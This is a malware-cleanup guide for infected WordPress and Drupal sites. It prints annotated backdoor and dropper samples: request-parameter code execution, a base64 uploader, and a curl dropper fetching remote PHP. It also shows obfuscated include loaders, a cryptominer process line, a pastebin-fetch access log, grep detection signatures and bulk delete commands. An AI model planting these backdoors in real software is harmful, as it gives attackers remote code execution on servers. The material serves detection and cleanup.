Prevent WordPress malware from infecting the server

Effects:

1. www.wordpresssite.com/wp-admin

2. .htaccess

3. Unknown files & folders

4. Random articles in WP POST

5. Random admin users

Steps taken to prevent malware infection:

500      56861  0.0  0.2 222180 10936 ?        S    Sep23   0:00 /usr/bin/php /public_html/stylewpp.php
500      56885  198  0.1  69408  8028 ?        Sl   Sep23 5940:27 ./cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u 4635633@mail.ru -p x --variant 1 -k
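# Triage: files changed in the last 4 days (what the infection touched).
find ./ -type f -mtime -4
# Dropped loaders are named index.php. Review the list before deleting: WordPress core,
# themes and plugins ship legitimate index.php files, so removing every match breaks
# the site. -type f keeps find away from any directory of the same name; `rm -f` with
# `+` batches paths into one invocation instead of forking per file.
find ./ -type f -name index.php
find ./ -type f -name index.php -exec rm -f {} +
# Hidden "icon" files that actually hold PHP (see the obfuscated include below);
# same review-first rule — genuine favicons match too.
find ./ -type f -name "*.ico"
find ./ -type f -name "*.ico" -exec rm -f {} +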
<?php
// Loader written into the dropped index.php files. Note the single quotes: PHP does not
// expand \NNN octal escapes inside single-quoted strings, so exactly as shown this would
// look for a file literally named publ\151c_ht\155l/... — the working dropper presumably
// used double quotes, under which the path decodes to
// public_html/wp-includes/Requests/Auth/.19a929b9.ico (a hidden ".ico" holding PHP).
// Detection: grep include/require statements whose argument contains backslash-digit sequences.
include 'publ\151c_ht\155l/wp\055incl\165des/\122eque\163ts/A\165th/.\0619a92\071b9.i\143o';
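# Droppers on this site used 8-letter lowercase names (e.g. dkelfesa.php). grep -E replaces
# the obsolescent egrep. The unescaped '.' before '/' matches any character, so nested paths
# such as ./wp-content/abcdefgh.php are found too. Expect legitimate hits (template.php,
# settings.php, ...) — review each file before removing it.
find . -type f | grep -E './[a-z]{8}\.php'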
<?php
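# Signature greps for the PHP droppers/backdoors seen in this infection. -print0/-0 keeps
# paths containing spaces or quotes intact; the patterns are basic regexes, so '(' is
# literal. Some legitimate code matches too (base64_decode, @include, eval in real
# plugins) — inspect every reported file rather than deleting on sight.
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *=PHP_VERSION *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *Phar::interceptFileFuncs() *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *@include *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *interceptFileFuncs *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *eval *( *gzinflate *( *base64_decode *( *"
find . -type f -name "*.php" -exec grep -H "eval(" {} +
find . -type f -name '*.php' -print0 | xargs -0 grep -l "eval *("
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *base64_decode *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *function *wscandir *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *HTTP/1.0 *404 *Not *Found *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *@gzuncompress *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *Array *( *) *; *global *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *@unserialize *"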
<?php
// Sample of a dropped one-line backdoor (obfuscated). $c2 is a character table; the index
// list $y3 spells out the name of a base64 decoder, and the reversed, chunked literal in
// $v5 rebuilds create_function. Net effect: the `sort` request parameter is decoded and
// executed as PHP, then a companion file under wp-admin/ is pulled in with @require.
// create_function was removed in PHP 8.0, so this variant only works on PHP 7 and older.
// Detection: strrev( or chunked string literals next to $_REQUEST/$_GET/$_POST, and a
// variable used as a function name ($name(...)) whose value is assembled from a table.
$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();@require('wp-admin/A5');
$O_00_0OO_O='10196';$O0O_O__0O0='1';$O___OOO000='1';$OO_0O_00O_=("t1j7n80g4hbcesydpvxuimkf6_olz2a5q-w93r");$O0_00O_OO_=$OO_0O_00O_{16}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{7}.$OO_0O_00O_{25}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{16}.$OO_0O_00O_{27}.$OO_0O_00O_{30}.$OO_0O_00O_{11}.$OO_0O_00O_{12}.$OO_0O_00O_{25}.$OO_0O_00O_{11}.$OO_0O_00O_{30}.$OO_0O_00O_{27}.$OO_0O_00O_{27}.$OO_0O_00O_{10}.$OO_0O_00O_{30}.$OO_0O_00O_{11}.$OO_0O_00O_{22};$OO00_O0__O=$OO_0O_00O_{13}.$OO_0O_00O_{0}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{30}.$OO_0O_00O_{21}.$OO_0O_00O_{25}.$OO_0O_00O_{13}.$OO_0O_00O_{26}.$OO_0O_00O_{11}.$OO_0O_00O_{22}.$OO_0O_00O_{12}.$OO_0O_00O_{0}.$OO_0O_00O_{25}.$OO_0O_00O_{11}.$OO_0O_00O_{27}.$OO_0O_00O_{20}.$OO_0O_00O_{12}.$OO_0O_00O_{4}.$OO_0O_00O_{0};$OO0_0__O0O=$OO_0O_00O_{13}.$OO_0O_00O_{0}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{30}.$OO_0O_00O_{21}.$OO_0O_00O_{25}.$OO_0O_00O_{7}.$OO_0O_00O_{12}.$OO_0O_00O_{0}.$OO_0O_00O_{25}.$OO_0O_00O_{21}.$OO_0O_00O_{12}.$OO_0O_00O_{0}.$OO_0O_00O_{30}.$OO_0O_00O_{25}.$OO_0O_00O_{15}.$OO_0O_00O_{30}.$OO_0O_00O_{0}.$OO_0O_00O_{30};$O_O_0_00OO=$OO_0O_00O_{13}.$OO_0O_00O_{0}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_
<?php
// Same loader as found in the dropped index.php files. With single quotes PHP keeps the
// \NNN sequences literal, so as printed here the include would fail; read as a
// double-quoted string the octal escapes decode to
// public_html/wp-includes/Requests/Auth/.19a929b9.ico — a dotfile with an .ico
// extension that is really PHP. Hunt for backslash-digit runs inside include/require arguments.
include 'publ\151c_ht\155l/wp\055incl\165des/\122eque\163ts/A\165th/.\0619a92\071b9.i\143o';
<?php 
// Decoded form of the obfuscated include: the hidden ".ico" under
// wp-includes/Requests/Auth/ holds the actual PHP payload; the loader lines in the
// dropped index.php files only point at it. Deleting the index.php copies without this
// file (and whatever recreates it) leaves the infection in place.
include 'public_html/wp-includes/Requests/Auth/.19a929b9.ico'; 
?>
<?php 
// Sample "uploader" backdoor. A single POST parameter with a 21-digit name carries a
// URL-safe base64 payload; it is written to 407.php, executed via require_once and the
// file removed again, so 407.php exists on disk only for the duration of the request.
// Detection: POST requests whose body has a long all-digit parameter name, file-audit
// events for 407.php, and grep for strtr(... '-_,', '+/=') next to base64_decode.
error_reporting(E_ERROR);set_time_limit(0);   // hide notices/warnings, lift the execution time cap
if(isset($_POST['880051156510591875071'])){
 $tofile='407.php';
 $a =base64_decode(strtr($_POST['880051156510591875071'], '-_,', '+/=')); // '-_,' -> '+/=' maps the URL-safe alphabet back to standard base64
 $a='<?php '.$a.'?>';
 @file_put_contents($tofile,$a);   // @ suppresses write failures
 require_once('407.php');
 @unlink($tofile);
 exit;}
?>
1. wp-load-5ba4acb3dcd415ba4acb3dcdc6.php
2. wp-settings-5ba4acb0b6fbb5ba4acb0b7027
185.183.96.159 - - [25/Sep/2018:03:15:45 +0100] "GET /?key=uploadUpdate&url=key=uploadUpdate&url=https%3A%2F%2Fpastebin.com%2Fraw%2FsYtyF6ag&file_name=wp-settings-5bac3e81089ad5bac3e8108a05 HTTP/1.1" 200 53523 "http://mydomain.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
185.183.96.159 - - [25/Sep/2018:03:15:45 +0100] "POST /wp-settings-5bac3e81089ad5bac3e8108a05.php HTTP/1.1" 200 7499 "http://mydomain.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
key=uploadUpdate&url=https%3A%2F%2Fpastebin.com%2Fraw%2FsYtyF6ag&file_name=wp-settings-5bac3e81089ad5bac3e8108a05
// Dropper hooked into WordPress' 'init' action. On any request carrying ?key=uploadUpdate
// it fetches $_GET['url'] with curl (60 s timeout), prefixes the body with a
// `<?php /*<uniqid>*/ ?>` tag and writes it to DOCUMENT_ROOT/<file_name>.php. There is
// no authentication, nonce, or validation of url/file_name. The GET/POST pair in the
// access log above appears to be exactly this: fetch a pastebin paste into
// wp-settings-<hash>.php, then request that file.
// Detection: add_action('init' near curl_init/file_put_contents inside wp-content, and
// requests with key=uploadUpdate in the access log.
add_action('init', 'wordpress_download');function wordpress_download(){if($_GET['key']=='uploadUpdate'){function wordpress_file_func($path, $data){file_put_contents($path, '<?php /*'.uniqid().'*/ ?>'.$data);}$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch,CURLOPT_TIMEOUT,60);$data = curl_exec($ch);$dsdsvxz = $data.'';wordpress_file_func($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['file_name'].'.php', $dsdsvxz);}}
if (array_key_exists ('article', $_REQUEST)){$load_path = get_load_path ();require_once ($load_path);print "#loaded wp-load#\n";list ($content, $title) = get_article ();$post_id = wp_insert_post (array('post_title' => $title,'post_content' => $content,'post_status' => 'publish','post_date' => date('Y-m-d H:i:s'),'post_author' => get_admin_id (),'post_type' => 'post','post_category' => array(0)));if ($post_id){$link = get_permalink($post_id);print "#Created post_id: !$post_id!$link!#\n";}else{print "#Unable to create new post#\n";}}echo "#Failed: $post_link#\n";}}?>
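# BEGIN protect xmlrpc.php
# xmlrpc.php is the usual target for credential brute-forcing and pingback abuse;
# refusing it at the web server stops that before PHP runs. "Require all denied" is the
# Apache 2.4 form; the Order/Deny pair is kept for 2.2 hosts (or 2.4 with
# mod_access_compat), where the 2.4 directive would be a syntax error.
# Note: this also disables Jetpack and the WordPress mobile apps, which use XML-RPC.
<Files xmlrpc.php>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</Files>
# END protect xmlrpc.php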
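# Reset permissions under the site root (/path is a placeholder — never run this on /):
# owner read/write, group/other read-only, directories and already-executable files
# traversable via X. go-w strips any world/group-writable bits the malware left behind.
chmod -R u+rwX,go+rX,go-w /path
# Then normalise to the conventional 755 (directories) / 644 (files). `+` hands find's
# matches to one chmod invocation in batches instead of forking once per path.
find . -type d -exec chmod 755 {} +
find . -type f -exec chmod 644 {} +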
/wp-content/uploads/revslider/templates/techco-menu/wp-rewrite.php
Conclusion :

Source: medium.com

Malware, Monit.php, ico file hack, index.php hack

I believe I finally got the upper hand on this attack. From what I’m reading online it was part of the Drupalgeddon2 exploits. I didn’t upgrade to 7.59 fast enough. People are claiming you should scrap your sites and servers over this. I’m not willing to do that. You may not be able to clean this attack if you do not have WHM root access.

This hack is characterized by a few things:
1. Admin accounts you didn’t make showing up.
2. Roles you didn’t make showing up.
3. Malicious “ico” files showing up on the server with php code in them.
4. Random php files showing up across the site directories.
5. A lot of extra “index.php” files showing up across the site.
6. php and inc files that have been modified with obfuscated code.
7. Cross-site infections on a shared WHM. Infected files in the home/cpeasyapache directory.

Some are saying there are “back doors” made where the hackers are getting in. I highly doubted this after patching to 7.59 as the malicious admin accounts were not showing back up. What was happening is that the “ico” files were popping up every 5 – 10 hours, and these in turn were creating a bunch of random string php files and index.php files that pointed back to the ico file. This code seemed to be able to affect multiple sites sharing the same WHM.

Steps to fix the hack without trashing your sites:

Prep:
1. Backup your site and database, put site into maintenance mode.
2. Make sure you have SSH access to your WHM or Cpanel
3. Login to site and remove any malicious admin accounts.
4. Remove any roles you didn’t make.
5. From cPanel, using phpMyAdmin, look at your database tables for users and roles, delete any tables you know shouldn’t be there. (user 0 is supposed to be there)
6. Change all database and user passwords.




Fix:
1. From SSH, run a search from the public_html folder like this:

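# Explicit start path (POSIX find requires one) and -type f so only regular files are
# listed. Every hit outside the document root is suspect; check the listing before deleting.
find . -type f -name index.php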

If you see a shitload of files come up on Drupal, you are hacked. There is only supposed to be 1 index.php.

2. Delete ALL of the index.php files with this command:

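# Removes every index.php below the current directory, including the legitimate root one
# (the Drupal re-install below restores it). -type f and `rm -f` avoid recursive removal
# of a directory that happens to carry the name; `+` batches the paths into one rm call.
# Do not reuse this on a WordPress tree — there the many index.php stubs are legitimate.
find . -type f -name index.php -exec rm -f {} +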

We will replace the main index.php file when we update to the newest Drupal.

3. Search for icon files that don’t belong with this command:

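# The malicious ones are dotfiles with a random hex-looking name (e.g. .421be9a7.ico);
# genuine favicons show up here too, so read the list before the delete step.
find . -type f -name "*.ico"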

If you see a bunch of strange icon files starting with a . and having a random string, they are PHP files. I just removed all icon files as I don’t give a shit about them with:

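# Deletes every .ico below the current directory, real favicons included. -type f plus
# `rm -f` (instead of rm -rf) limits this to regular files; `+` batches the paths.
# To keep genuine icons, delete only the dot-prefixed ones: -name ".*.ico".
find . -type f -name "*.ico" -exec rm -f {} +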

If you want to keep your icon files, just manually delete the suspicious ones with FTP. I’m reading that there were also files other than .ico that were associated with this hack. An easy way to identify which extension they are using is to open up one of your hacked index.php files and copy this line of text:

// Loader line copied from a hacked index.php. Inside a double-quoted PHP string the
// backslash-octal sequences are ordinary escapes, so the path can be decoded offline with
// `php -r 'echo "<the string>";'` instead of pasting server paths into a third-party site.
// Here it resolves to an absolute path under the account's public_html/profiles/testing/
// ending in a hidden .<8 hex chars>.ico file — that extension is the one to hunt for.
// The leading @ silences the warning PHP would otherwise log when the file is missing.
@include "\057h\157m\145/\147l\145n\143c\057p\165b\154i\143_\150t\155l\057p\162o\146i\154e\163/\164e\163t\151n\147/\0564\0621\142e\071a\067.\151c\157";

Paste it here: Unphp.net

It will tell you which malicious file it is pointed at. Use that information to remove all of the files of that type using the SSH command above but for the malicious extension instead of .ico.




4. Find the other malicious php files that don’t belong. On my site, they were all php files with 8 a-z character names. Like dkelfesa.php or something. Use this regex to look for 8 character php files:

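# Finds PHP files whose basename is exactly 8 lowercase letters. grep -E replaces the
# obsolescent egrep; the unescaped '.' before '/' matches any character, so matches at any
# depth are reported. Legitimate files fit the pattern too (template.php, settings.php),
# so inspect before removing.
find . -type f | grep -E './[a-z]{8}\.php'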

Remove any you suspect are malicious. Typically the name won’t make any sense. If you open them and see a bunch of PHP code you can’t read, they are malicious.

5. After doing all of that, I was still getting hacked and couldn’t figure it out. I decided to open my database for the site in phpMyAdmin and run a search on all tables for:

<?php

to look for any malicious PHP code I had missed. It turns out that when the original hack happened the hacker had used the admin account to create a block called “Development”. He gave it no title, and in the body inserted his malicious PHP code. He then enabled this on the site. He could remotely call it and it would reinfect the site with the ico files, the index.php files, and the random string PHP files. Run a database search for the PHP tag above and look at all results for malicious code across your site in content nodes or blocks. Remove any code you can’t easily read.

6. There were also quite a few php and inc files across the Drupal installation that had either been modified with malicious PHP at the top of the file, or just didn’t belong. They were cleverly named and stashed away into modules folders, library folders, everywhere. As I discovered them I created these grep patterns to help others find them. Unfortunately I found 4 malicious files in the /home/cpeasyapache directory. These looked to have the ability to scan all sites on the shared host and infect them all. Use these searches at the WHM root level to look for malicious php and inc files. Remove or clean them.

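# Signature greps for the modified/dropped PHP files found in this infection. Run from
# the WHM root so shared-host locations such as /home/cpeasyapache are covered.
# -print0/-0 keeps paths with spaces intact; patterns are basic regexes ('(' is literal).
# Legitimate code also matches some of these (@include, base64_decode) — review every hit.
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *=PHP_VERSION *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *Phar::interceptFileFuncs() *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *@include *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *interceptFileFuncs *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *eval *( *gzinflate *( *base64_decode *( *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *base64_decode *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *function *wscandir *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *HTTP/1.0 *404 *Not *Found *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *@gzuncompress *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *Array *( *) *; *global *"
find . -type f -name '*.php' -print0 | xargs -0 grep -l " *@unserialize *"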

If you don’t have access to your root, contact your host provider to have them scan it for the above patterns to remove the malicious files.

Here is an example of some malicious code found in a file in the /cpeasyapache directory of the WHM root:

The full file had some functions that scanned the root, looked for inc and php files, changed folder permissions, and created the index.php files. There were 4 files in the cpeasyapache directory that looked similar to this:
Malicious.txt

Wrap up:
Once you have done this, download the latest version of Drupal and copy it over to your site. This will replace the main index.php file and your site should be up and working again.

Install latest modules.

Run update.php

Lastly, check the file permission settings in the public_html folder. Directories should be set to 740 and files to 644. A quick way to do this is:
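# 740 on directories gives "other" no traverse bit, which only works when the web server
# runs as the account user or its group (typical on cPanel/suEXEC hosts). Where PHP runs as
# a separate user such as nobody, 740 makes the site 403 — use 755 for directories there
# (the permission commands elsewhere on this page use 755 for that reason).
# `+` batches paths into one chmod invocation instead of forking per match.
find . -type d -exec chmod 740 {} +
find . -type f -exec chmod 644 {} +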

Once done, install the “Hacked” module to inspect your site for changes associated with this hack.

Other good modules are login security, and path2ban.

Clear all site caches and web browser history / caches.

Cheers
